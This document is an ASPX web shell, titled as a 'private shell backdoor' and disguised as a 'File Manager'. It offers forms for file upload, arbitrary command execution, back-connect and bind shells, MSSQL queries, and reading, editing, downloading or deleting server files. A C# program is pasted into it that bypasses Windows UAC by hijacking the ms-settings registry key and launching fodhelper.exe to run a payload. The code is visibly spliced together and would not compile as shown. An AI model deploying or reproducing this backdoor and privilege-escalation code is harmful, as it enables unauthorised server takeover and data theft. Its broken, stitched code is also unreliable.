[$] Pr1v473 xHeEl B4ckD00RzZ [$]
<%@ Page Language="C#" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<!DOCTYPE html>
<html>
<head>
<title>File Manager</title>
<style>
body {
background-color: black;
color: white;
font-family: Arial, sans-serif;
}
input, textarea, select {
background-color: #333;
color: white;
border: 1px solid #555;
}
a {
color: #00aaff;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
pre {
white-space: pre-wrap;
word-wrap: break-word;
}
</style>
<script>
function toggleVisibility(id) {
var element = document.getElementById(id);
if (element.style.display === 'none') {
element.style.display = 'block';
} else {
element.style.display = 'none';
}
}
</script>
</head>
<body>
<h1>ASPX File Manager</h1>
<%
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Management;
using Microsoft.Win32;
using System.Diagnostics;
namespace UAC_Bypass
{
class Program
{
static void Main(string[] args)
{
// Payload to be executed
Console.WriteLine("[+] Starting Bypass UAC.");
string payload = "";
if (args.Length > 0)
{
payload = args[0];
Console.WriteLine(@"[+] Payload to be Executed " + payload);
}
else
{
Console.WriteLine("[+] No Payload specified. Executing cmd.exe.");
payload = @"C:\Windows\System32\cmd.exe";
}
try
{
// Registry Key Modification
Microsoft.Win32.RegistryKey key;
key = Registry.CurrentUser.CreateSubKey(@"Software\Classes\ms-settings\shell\open\command");
key.SetValue("", payload, RegistryValueKind.String);
key.SetValue("DelegateExecute", 0, RegistryValueKind.DWord);
key.Close();
Console.WriteLine("[+] Registry Key Changed.");
}
catch
{
Console.WriteLine("[-] Unable to Modify the registry Key.");
Console.WriteLine("[-] Exit.");
}
//Wait 5 sec before execution
Console.WriteLine("[+] Waiting 5 seconds before execution.");
System.Threading.Thread.Sleep(5000);
// Trigger the UAC Bypass
try
{
ProcessStartInfo startInfo = new ProcessStartInfo();
startInfo.CreateNoWindow = true;
startInfo.UseShellExecute = false;
startInfo.FileName = "cmd.exe";
startInfo.Arguments = @"/c start fodhelper.exe";
Process.Start(startInfo);
Console.WriteLine("[+] UAC Bypass Application Executed.");
}
catch
{
Console.WriteLine("[-] Unable to Execute the Application fodhelper.exe to perform the bypass.");
}
DeleteKey();
Console.WriteLine("[-] Exit.");
}
static void DeleteKey()
{
//Wait 5 sec before cleaning
Console.WriteLine("[+] Registry Cleaning will start in 5 seconds.");
System.Threading.Thread.Sleep(5000);
try
{
var rkey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\ms-settings\shell\open\command",true);
// Validate if the Key was created
if (rkey != null)
{
try
{
Registry.CurrentUser.DeleteSubKey(@"Software\Classes\ms-settings\shell\open\command");
}
catch
{
Console.WriteLine(@"[-] Unable to the Registry key (Software\Classes\ms-settings\shell\open\command).");
}
}
Console.WriteLine("[+] Registry Cleaned.");
//return true;
}
catch
{
Console.WriteLine("[-] Unable to Clean the Registry.");
//return false;
}
}
}
}
%>
<form method="post" enctype="multipart/form-data">
<input type="file" name="fileToUpload" />
<input type="submit" name="upload" value="Upload File" />
</form>
<br />
<form method="post">
<input type="text" name="cmd" placeholder="Enter command" />
<input type="submit" value="Execute Command" />
</form>
<br />
<div>
<button onclick="toggleVisibility('backConnectForm')">Back Connect</button> -
<button onclick="toggleVisibility('bindConnectForm')">Bind Connect</button> -
<button onclick="toggleVisibility('mssqlForm')">MSSQL Query</button>
</div>
<div id="backConnectForm" style="display:none;">
<form method="post">
<input type="text" name="host" placeholder="Back connect host" />
<input type="text" name="port" placeholder="Back connect port" />
<input type="submit" name="backConnect" value="Initiate Back Connect" />
</form>
</div>
<div id="bindConnectForm" style="display:none;">
<form method="post">
<input type="text" name="port" placeholder="Bind connect port" />
<input type="submit" name="bindConnect" value="Initiate Bind Connect" />
</form>
</div>
<div id="mssqlForm" style="display:none;">
<form method="post">
<input type="text" name="connectionString" placeholder="MSSQL connection string" />
<textarea name="query" placeholder="Enter MSSQL query" rows="5" cols="80"></textarea><br />
<input type="submit" name="mssqlQuery" value="Execute Query" />
</form>
</div>
<br />
<ul>
<%
if (dirInfo.Parent != null)
{
Response.Write("<li><a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(dirInfo.Parent.FullName) + "'>.. (Up)</a></li>");
}
foreach (DirectoryInfo dir in dirInfo.GetDirectories())
{
Response.Write("<li><a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(dir.FullName) + "'>" + dir.Name + "</a></li>");
}
foreach (FileInfo file in dirInfo.GetFiles())
{
Response.Write("<li>" + file.Name + " - <a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(currentPath) + "&delete=" + file.Name + "'>Delete</a> - <a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(currentPath) + "&edit=" + file.Name + "'>Edit</a> - <a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(currentPath) + "&read=" + file.Name + "'>Read</a> - <a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(currentPath) + "&download=" + file.Name + "'>Download</a></li>");
}
%>
</ul>
<%
if (!string.IsNullOrEmpty(Request.QueryString["read"]))
{
string fileToRead = Path.Combine(currentPath, Request.QueryString["read"]);
if (File.Exists(fileToRead))
{
string fileContent = File.ReadAllText(fileToRead);
Response.Write("<h3>Reading File: " + Request.QueryString["read"] + "</h3>");
Response.Write("<pre>" + Server.HtmlEncode(fileContent) + "</pre>");
}
}
else if (!string.IsNullOrEmpty(Request.QueryString["edit"]))
{
string fileToEdit = Path.Combine(currentPath, Request.QueryString["edit"]);
if (File.Exists(fileToEdit))
{
string fileContent = File.ReadAllText(fileToEdit);
Response.Write("<h3>Editing File: " + Request.QueryString["edit"] + "</h3>");
Response.Write("<form method='post'>");
Response.Write("<input type='hidden' name='filePath' value='" + fileToEdit + "' />");
Response.Write("<textarea name='fileContent' rows='20' cols='80'>" + Server.HtmlEncode(fileContent) + "</textarea><br />");
Response.Write("<input type='submit' name='save' value='Save' />");
Response.Write("</form>");
}
}
else if (!string.IsNullOrEmpty(Request.QueryString["download"]))
{
string fileToDownload = Path.Combine(currentPath, Request.QueryString["download"]);
if (File.Exists(fileToDownload))
{
Response.Clear();
Response.ContentType = "application/octet-stream";
Response.AddHeader("Content-Disposition", "attachment; filename=" + Path.GetFileName(fileToDownload));
Response.WriteFile(fileToDownload);
Response.End();
}
}
%>
</body>
</html>